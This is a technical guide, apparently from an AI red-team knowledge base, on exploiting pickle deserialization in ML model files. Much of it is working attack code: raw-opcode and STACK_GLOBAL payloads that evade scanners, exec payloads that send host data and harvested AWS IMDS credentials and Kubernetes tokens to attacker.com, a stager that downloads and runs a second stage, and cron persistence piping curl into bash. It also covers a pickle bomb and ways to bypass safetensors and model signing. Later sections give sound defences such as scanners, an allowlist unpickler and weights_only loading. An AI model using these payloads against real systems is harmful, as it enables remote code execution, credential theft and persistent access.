Pickle Deserialization Exploits
Technical methodology for crafting pickle payloads, bypassing safetensors and model signing, and exploiting ML model deserialization across frameworks.
Pickle deserialization is the most reliable RCE vector in the ML ecosystem. Unlike traditional deserialization bugs requiring gadget chains, pickle exploitation is straightforward by design: the __reduce__ protocol allows arbitrary reconstruction logic, and the ML ecosystem has normalized loading untrusted pickle files as standard practice.
Pickle VM Internals
Key Opcodes for Exploitation
| Opcode | Name | Function | Use in Exploits |
|---|---|---|---|
| `R` | REDUCE | Pop callable + args tuple, call `callable(*args)` | Primary RCE primitive |
| `c` | GLOBAL | Push `module.name` onto stack | Reference `os.system`, `exec`, etc. |
| `i` | INST | Create instance via `cls(*args)` | Alternative to REDUCE |
| `b` | BUILD | Call `obj.__setstate__(state)` | Complex object reconstruction |
| `\x93` | STACK_GLOBAL | Like GLOBAL but reads names from the stack | Dynamic callable resolution (evasion) |
Use pickletools.dis(data) to disassemble any pickle and inspect its opcodes.
```python
import pickle, pickletools

class SimplePayload:
    def __reduce__(self):
        return (eval, ("print('RCE')",))

pickletools.dis(pickle.dumps(SimplePayload()))
# Shows a STACK_GLOBAL -> REDUCE chain calling eval()
```

Payload Construction Methodology
Choose the execution primitive

Use `__reduce__` for Python-level payloads, or raw opcode bytecode for evasion.

| Primitive | Complexity | Evasion | Use When |
|---|---|---|---|
| `__reduce__` + `os.system` | Low | None | Quick PoC, no scanner in place |
| `__reduce__` + `exec` | Low | None | Multi-statement payloads |
| Raw opcodes (`c`, `R`) | Medium | Bypasses `__reduce__` inspection | Target uses Python-level analysis |
| STACK_GLOBAL opcodes | High | Bypasses static GLOBAL checks | Target scans for known module names |

Build the payload
For basic payloads, use `__reduce__`. For scanner evasion, craft raw bytecode.

```python
def craft_raw_pickle(command: str) -> bytes:
    """Raw opcode payload bypassing __reduce__ inspection."""
    payload = b'\x80\x02'                              # PROTO 2
    payload += b'cos\nsystem\n'                        # GLOBAL: os.system
    payload += b'(' + b'V' + command.encode() + b'\n'  # MARK + UNICODE arg
    payload += b'tR.'                                  # TUPLE + REDUCE + STOP
    return payload
```

Add stealth: return valid model data
Wrap the payload so it executes silently and returns a legitimate-looking object (e.g., a `state_dict`), preventing the victim from noticing anything wrong.

Stage the delivery
For minimal pickle size, use a multi-stage approach: the pickle downloads and executes a second-stage script from an attacker-controlled server.
Advanced Payload Techniques
Chained Execution
Use exec() to run multi-statement payloads: reconnaissance, credential exfiltration, and persistence in a single deserialization.
```python
class ChainedPayload:
    def __reduce__(self):
        return (exec, (
            "import os,socket,json,urllib.request\n"
            "recon={'host':socket.gethostname(),'user':os.getenv('USER')}\n"
            "urllib.request.urlopen(urllib.request.Request("
            "'https://attacker.com/beacon',json.dumps(recon).encode()))"
        ,))
```

Multi-Stage Payloads
For maximum stealth and flexibility, use the initial pickle execution to download and run a second-stage payload. This keeps the pickle file small and allows the attacker to change the second stage without re-crafting the pickle.
```python
class StagerPayload:
    """Minimal first-stage payload that downloads and executes a
    second-stage script from an attacker-controlled server."""
    def __reduce__(self):
        return (exec, (
            "import urllib.request,tempfile,os\n"
            "stage2=urllib.request.urlopen('https://attacker.com/stage2.py').read()\n"
            "f=tempfile.NamedTemporaryFile(suffix='.py',delete=False)\n"
            "f.write(stage2);f.close()\n"
            "exec(open(f.name).read())\n"
            "os.unlink(f.name)"
        ,))

class PersistencePayload:
    """Install a cron job or systemd timer for persistent access."""
    def __reduce__(self):
        return (exec, (
            "import os,subprocess\n"
            "cron = '*/5 * * * * curl -s https://attacker.com/c2|bash'\n"
            "subprocess.run(['bash','-c',"
            "f'(crontab -l 2>/dev/null; echo \"{cron}\") | crontab -'],"
            "capture_output=True)"
        ,))
```

Polymorphic Payloads
Adapt behavior based on environment detection:
| Environment Check | Exploitation Path |
|---|---|
| `os.path.exists('/.dockerenv')` | Container escape techniques |
| `'KUBERNETES_SERVICE_HOST' in os.environ` | Read service account token, enumerate cluster |
| `'AWS_EXECUTION_ENV' in os.environ` | Query IMDS for IAM credentials |
| `os.path.exists('/dev/nvidia0')` | Scan GPU memory, enumerate model storage |
| `/proc/self/cgroup` contains `kubepods` | Kubernetes pod, read mounted secrets |
| `'AZURE_CLIENT_ID' in os.environ` | Azure managed identity, get ARM token |
| `requests.get('http://metadata.google.internal', timeout=1)` succeeds | GCP instance, query metadata server |
```python
class PolymorphicPayload:
    """Detects the runtime environment and executes the appropriate
    credential harvesting technique."""
    def __reduce__(self):
        return (exec, (
            "import os,json,urllib.request\n"
            "env_info = {'platform': 'unknown'}\n"
            "try:\n"
            "    if 'AWS_EXECUTION_ENV' in os.environ:\n"
            "        env_info['platform'] = 'aws'\n"
            "        r = urllib.request.urlopen(\n"
            "            'http://169.254.169.254/latest/meta-data/iam/security-credentials/')\n"
            "        role = r.read().decode()\n"
            "        creds = json.loads(urllib.request.urlopen(\n"
            "            f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role}'\n"
            "        ).read())\n"
            "        env_info['creds'] = creds\n"
            "    elif os.path.exists('/var/run/secrets/kubernetes.io'):\n"
            "        env_info['platform'] = 'k8s'\n"
            "        with open('/var/run/secrets/kubernetes.io/serviceaccount/token') as f:\n"
            "            env_info['sa_token'] = f.read()\n"
            "except: pass\n"
            "urllib.request.urlopen(urllib.request.Request(\n"
            "    'https://attacker.com/beacon',\n"
            "    json.dumps(env_info).encode(),\n"
            "    {'Content-Type':'application/json'}))"
        ,))
```

Pickle Bomb (Resource Exhaustion)
Pickle bombs use nested tuple duplication: a kilobyte-sized pickle can expand to tens of gigabytes in memory. Each nesting level doubles the reference count (30 levels ≈ 1 billion references).
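On the defensive side, a loader can bound this class of attack before unpickling: `pickletools.genops` walks the opcode stream without executing it, and each opcode can create at most one new object, so a budget on opcode count caps allocation. A minimal sketch; the function name and the 100,000-opcode limit are illustrative assumptions:

```python
import pickle
import pickletools

def load_with_opcode_budget(data: bytes, max_ops: int = 100_000):
    """Refuse pickles whose opcode count exceeds a budget.
    genops parses the stream without executing it, so the check
    itself is safe; combine with a restricted Unpickler, since
    opcode count says nothing about which callables run."""
    n_ops = sum(1 for _ in pickletools.genops(data))
    if n_ops > max_ops:
        raise ValueError(f"pickle contains {n_ops} opcodes (limit {max_ops})")
    return pickle.loads(data)
```

This guard only limits resource exhaustion; it does nothing against `os.system`-style payloads, which need the allowlist approach shown later.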
```python
import pickle

def create_pickle_bomb(levels=25):
    """Create a pickle bomb that expands exponentially on deserialization.
    WARNING: Only use in controlled environments with memory limits."""
    # Start with a small byte string
    payload = b'A' * 1024  # 1 KB
    # Each level wraps the payload in a duplicated tuple and re-pickles
    for _ in range(levels):
        payload = pickle.dumps((payload,) * 2)
    return payload

# A 25-level bomb: ~1 KB of seed data, ~32 GiB if fully expanded
# bomb = create_pickle_bomb(25)
# print(f"Serialized size: {len(bomb)} bytes")
# Caveat: pickle memoizes repeated references, so the duplicated tuples
# share storage on load; the full expansion is realized only when a
# consumer copies or flattens the structure.
```

STACK_GLOBAL Evasion Technique
Static scanners typically search for GLOBAL opcodes referencing known dangerous modules. The STACK_GLOBAL opcode (\x93) achieves the same effect but reads the module and attribute names from the stack instead of inline, making it harder for simple pattern-matching scanners to detect.
```python
def craft_stack_global_payload(command: str) -> bytes:
    """Craft a payload using STACK_GLOBAL to evade scanners
    that only check GLOBAL opcodes for dangerous module names."""
    payload = b'\x80\x04'  # Protocol 4
    # Push module name onto stack via SHORT_BINUNICODE
    module = b'os'
    payload += b'\x8c' + bytes([len(module)]) + module
    # Push attribute name onto stack
    attr = b'system'
    payload += b'\x8c' + bytes([len(attr)]) + attr
    # STACK_GLOBAL reads module+attr from stack (not inline)
    payload += b'\x93'
    # Push the command argument
    cmd = command.encode()
    payload += b'\x8c' + bytes([len(cmd)]) + cmd
    # TUPLE1 + REDUCE + STOP
    payload += b'\x85R.'
    return payload

# A scanner that only checks the 'c' (GLOBAL) opcode will miss this
# payload = craft_stack_global_payload("id")
```

Bypassing Safetensors
Safetensors is the recommended alternative to pickle, but the ecosystem transition is incomplete.
Bypass Vectors
Force pickle fallback

Remove safetensors files from a model repo. The `transformers` library checks for `model.safetensors` first, then falls back to `pytorch_model.bin` (pickle). Upload a model with only `.bin` files.

Exploit custom code execution

Even with safetensors weights, `trust_remote_code=True` executes arbitrary Python from `modeling_custom.py`. The model card says "safetensors" but the repo contains executable code.

```
model.safetensors    # Safe weight storage
config.json          # Points to custom code
modeling_custom.py   # ARBITRARY CODE EXECUTION
```

Target tokenizer code

`tokenizer_config.json` can reference a custom `tokenizer_custom.py`. This is a lower-profile attack surface because scanners focus on model files.
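A defensive counterpart to these bypasses is to audit a downloaded repo for file types that can carry executable payloads before loading anything. A minimal sketch, assuming a local directory layout; the suffix allowlist and function name are illustrative, not a `transformers` API:

```python
from pathlib import Path

# Suffixes that cannot themselves carry executable payloads
# (illustrative allowlist -- tighten for your environment)
SAFE_SUFFIXES = {'.safetensors', '.json', '.txt', '.md'}

def audit_model_dir(model_dir: str) -> list[str]:
    """Return files whose type can smuggle code into model loading:
    .py modules pulled in via trust_remote_code, pickle-bearing
    .bin/.pt/.pkl weights, and anything else off the allowlist."""
    flagged = []
    for p in sorted(Path(model_dir).rglob('*')):
        if p.is_file() and p.suffix.lower() not in SAFE_SUFFIXES:
            flagged.append(str(p.relative_to(model_dir)))
    return flagged
```

Note that `config.json` can still route execution to remote code via `auto_map`, so pair this audit with `trust_remote_code=False`.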
Defeating Model Signing
Organizations implementing model signing commonly leave three exploitable gaps:
| Weakness | Attack | Why It Works |
|---|---|---|
| Partial scope | Modify config.json or modeling_custom.py while signed weights remain untouched | Signature only covers weight files, not the full model directory |
| TOCTOU | Modify cached model files between signature verification (at download) and loading (later) | TOCTOU gap between verification and use |
| Graceful fallback | Strip signature files; loader proceeds without enforcing verification | Loader does not reject unsigned models |
Proper signing requires: signing all files in the model directory, enforcing signature at load time (not just download), pinning expected signatures in application config, and rejecting unsigned models with no fallback.
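Those requirements can be sketched as a pinned-digest check enforced at load time. This is a simplification standing in for real signature verification; the manifest format (a JSON map of relative path to SHA-256 hex digest, stored outside the model directory) is an assumption:

```python
import hashlib
import json
from pathlib import Path

def verify_model_dir(model_dir: str, manifest_path: str) -> None:
    """Enforce a pinned manifest at load time: every file in the model
    directory must appear in the manifest with a matching SHA-256, and
    no manifest entry may be missing. Raises on any mismatch -- there
    is no unsigned fallback."""
    pinned = json.loads(Path(manifest_path).read_text())  # {relpath: hexdigest}
    actual = {}
    for p in Path(model_dir).rglob('*'):
        if p.is_file():
            rel = str(p.relative_to(model_dir))
            actual[rel] = hashlib.sha256(p.read_bytes()).hexdigest()
    if actual != pinned:
        extra = sorted(set(actual) - set(pinned))
        missing = sorted(set(pinned) - set(actual))
        changed = sorted(k for k in set(actual) & set(pinned) if actual[k] != pinned[k])
        raise ValueError(
            f"model dir mismatch: extra={extra} missing={missing} changed={changed}")
```

Because the comparison is exact in both directions, stripped signature files, added `modeling_custom.py` modules, and tampered weights all fail closed instead of falling back to an unsigned load.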
Framework-Specific Attack Surface
| Framework | Serialization | Primary Risk | Mitigation | Mitigation Bypass |
|---|---|---|---|---|
| PyTorch | Pickle via torch.save | torch.load() = full pickle RCE | weights_only=True | Allowed globals may be chainable |
| scikit-learn | Pickle via joblib | joblib.load() = pickle RCE | Export to ONNX | Most tutorials use joblib |
| TensorFlow | Protobuf + custom ops | Custom ops execute at load time | Use standard ops only | Lambda layers contain arbitrary Python |
| Keras | HDF5 (.h5) | Lambda layers: lambda x: __import__('os').system('id') | Avoid Lambda layers | Legacy models often contain them |
Detection and Prevention
Static Pickle Scanning
Analyze pickle bytecode without deserializing. Flag GLOBAL, STACK_GLOBAL, and REDUCE opcodes that reference dangerous modules (os, subprocess, builtins, importlib, ctypes, socket).
```python
import pickletools

def scan_pickle(data: bytes) -> dict:
    """Scan pickle bytecode for dangerous operations."""
    DANGEROUS = {'os', 'subprocess', 'sys', 'eval', 'exec',
                 'builtins', 'importlib', 'ctypes', 'socket', 'urllib'}
    threats = []
    for opcode, arg, pos in pickletools.genops(data):
        # STACK_GLOBAL carries no inline arg (names come from the stack),
        # so the substring match only fires for GLOBAL/INST; the REDUCE
        # check below still flags the eventual call.
        if opcode.name in ('GLOBAL', 'INST', 'STACK_GLOBAL'):
            if arg and any(d in str(arg) for d in DANGEROUS):
                threats.append({"opcode": opcode.name, "arg": str(arg), "pos": pos})
        if opcode.name == 'REDUCE':
            threats.append({"opcode": "REDUCE", "pos": pos})
    return {"threats": threats,
            "verdict": "DANGEROUS" if threats else "LIKELY_SAFE"}
```

Using Fickling for Deep Analysis
Fickling by Trail of Bits provides more sophisticated pickle analysis than simple opcode scanning. It can decompile pickle bytecode back to Python, detect control flow manipulation, and identify obfuscated payloads that evade simple scanners.
```python
# pip install fickling
import ast
from fickling.fickle import Pickled
from fickling.analysis import check_safety

def deep_scan_pickle(filepath: str) -> dict:
    """Use Fickling for deep pickle analysis beyond opcode scanning."""
    with open(filepath, 'rb') as f:
        data = f.read()
    # Parse the pickle stream without executing it
    pickled = Pickled.load(data)
    return {
        "file": filepath,
        "size": len(data),
        # Fickling's built-in safety analysis of the parsed pickle
        "fickling_verdict": str(check_safety(pickled)),
        # Decompile to a Python AST to inspect what the pickle actually does
        "decompiled": ast.dump(pickled.ast),
    }
```

Fickling's API has shifted between releases; check the installed version's documentation for the exact `check_safety` and decompilation entry points.

Runtime Sandboxing
Override pickle.Unpickler.find_class with a strict allowlist of safe classes (e.g., collections.OrderedDict, torch.FloatStorage, numpy.ndarray). Reject everything else.
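As a compact, runnable sanity check of the `find_class` hook before the fuller example below (the `DemoSafeUnpickler` and `Malicious` names are illustrative, with `print` standing in for `os.system`):

```python
import io
import pickle
from collections import OrderedDict

class DemoSafeUnpickler(pickle.Unpickler):
    """Tiny allowlist unpickler for demonstration."""
    ALLOWED = {('collections', 'OrderedDict')}

    def find_class(self, module, name):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"Blocked: {module}.{name}")
        return super().find_class(module, name)

class Malicious:
    def __reduce__(self):
        # Benign stand-in for an os.system payload
        return (print, ("pwned",))

safe_data = pickle.dumps(OrderedDict(a=1))
evil_data = pickle.dumps(Malicious())

assert DemoSafeUnpickler(io.BytesIO(safe_data)).load() == OrderedDict(a=1)
try:
    DemoSafeUnpickler(io.BytesIO(evil_data)).load()
except pickle.UnpicklingError as e:
    print(e)  # Blocked: builtins.print
```

The allowlisted class loads normally; the malicious pickle is rejected before its callable ever runs, because `find_class` is consulted when the GLOBAL/STACK_GLOBAL opcode resolves, not after.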
```python
import pickle
import io

class SafeUnpickler(pickle.Unpickler):
    """Restrict pickle deserialization to only allowlisted classes.
    This prevents arbitrary code execution by blocking GLOBAL and
    STACK_GLOBAL references to dangerous modules."""
    ALLOWED_CLASSES = {
        ('collections', 'OrderedDict'),
        ('numpy', 'ndarray'),
        ('numpy', 'dtype'),
        ('numpy.core.multiarray', '_reconstruct'),
        ('torch', 'FloatStorage'),
        ('torch', 'LongStorage'),
        ('torch', 'IntStorage'),
        ('torch', 'HalfStorage'),
        ('torch._utils', '_rebuild_tensor_v2'),
        ('_codecs', 'encode'),
    }

    def find_class(self, module: str, name: str) -> type:
        if (module, name) not in self.ALLOWED_CLASSES:
            raise pickle.UnpicklingError(
                f"Blocked: {module}.{name} not in allowlist"
            )
        return super().find_class(module, name)

def safe_load(data: bytes):
    """Load pickle data with class restrictions."""
    return SafeUnpickler(io.BytesIO(data)).load()

# Usage: model_weights = safe_load(pickle_data)
# Raises UnpicklingError if the pickle tries to call os.system, eval, etc.
```

CI/CD Pipeline Integration
Integrate pickle scanning into your model deployment pipeline to catch malicious models before they reach production.
```python
import pickletools
import sys
import glob
import json

DANGEROUS_MODULES = {
    'os', 'subprocess', 'sys', 'eval', 'exec', 'builtins',
    'importlib', 'ctypes', 'socket', 'urllib', 'http',
    'shutil', 'signal', 'code', 'codeop', 'compile',
    'webbrowser', 'antigravity', 'turtle', 'tkinter'
}

def scan_model_directory(model_dir: str) -> dict:
    """Scan all pickle files in a model directory for threats."""
    results = {"scanned": 0, "clean": 0, "dangerous": 0, "details": []}
    pickle_extensions = ['*.pkl', '*.pickle', '*.pt', '*.pth', '*.bin',
                         '*.joblib', '*.npy', '*.npz']
    for ext in pickle_extensions:
        for filepath in glob.glob(f"{model_dir}/**/{ext}", recursive=True):
            results["scanned"] += 1
            try:
                with open(filepath, 'rb') as f:
                    data = f.read()
                threats = []
                for opcode, arg, pos in pickletools.genops(data):
                    if opcode.name in ('GLOBAL', 'INST', 'STACK_GLOBAL'):
                        # pickletools renders GLOBAL/INST args as
                        # "module name", so take the top-level module
                        module = str(arg).split()[0].split('.')[0] if arg else ''
                        if module in DANGEROUS_MODULES:
                            threats.append({
                                "opcode": opcode.name,
                                "ref": str(arg),
                                "position": pos
                            })
                if threats:
                    results["dangerous"] += 1
                    results["details"].append({
                        "file": filepath,
                        "verdict": "DANGEROUS",
                        "threats": threats
                    })
                else:
                    results["clean"] += 1
            except Exception as e:
                results["details"].append({
                    "file": filepath,
                    "verdict": "ERROR",
                    "error": str(e)
                })
    return results

if __name__ == '__main__':
    model_dir = sys.argv[1] if len(sys.argv) > 1 else '.'
    results = scan_model_directory(model_dir)
    print(json.dumps(results, indent=2))
    sys.exit(1 if results["dangerous"] > 0 else 0)
```

torch.load with weights_only=True
PyTorch's torch.load() supports weights_only=True (available since 1.13 and the default since 2.6), which restricts deserialization to tensor data and a small allowlist of safe types. This is the simplest defense for PyTorch-specific workflows.
```python
import torch

# Safe: only loads tensor data and allowlisted types
model_state = torch.load('model.pt', weights_only=True, map_location='cpu')

# Unsafe: full pickle deserialization (the default before PyTorch 2.6)
# model_state = torch.load('model.pt', weights_only=False)  # DO NOT use with untrusted files

# Note: weights_only=True may fail for checkpoints whose state_dict
# contains custom classes. Allowlist those classes explicitly instead
# of falling back to full pickle:
# torch.serialization.add_safe_globals([MyCustomClass])
```
Related Topics
- AI Supply Chain Exploitation -- Broader supply chain attack surface beyond pickle
- Training & Fine-Tuning Attacks -- Backdoor injection that relies on model serialization
- AI Infrastructure Exploitation -- Container escape and GPU cluster attacks that pickle RCE enables
- Red Team Tooling -- Scanning and automation for detecting pickle vulnerabilities
References
- Fickling: Pickle decompiler and static analyzer — Trail of Bits pickle analysis tool
- Never a Dill Moment: Exploiting Machine Learning Pickle Files — Trail of Bits research on pickle-based model attacks
- Safetensors: A Simple and Safe Way to Store and Distribute Tensors — The secure alternative to pickle serialization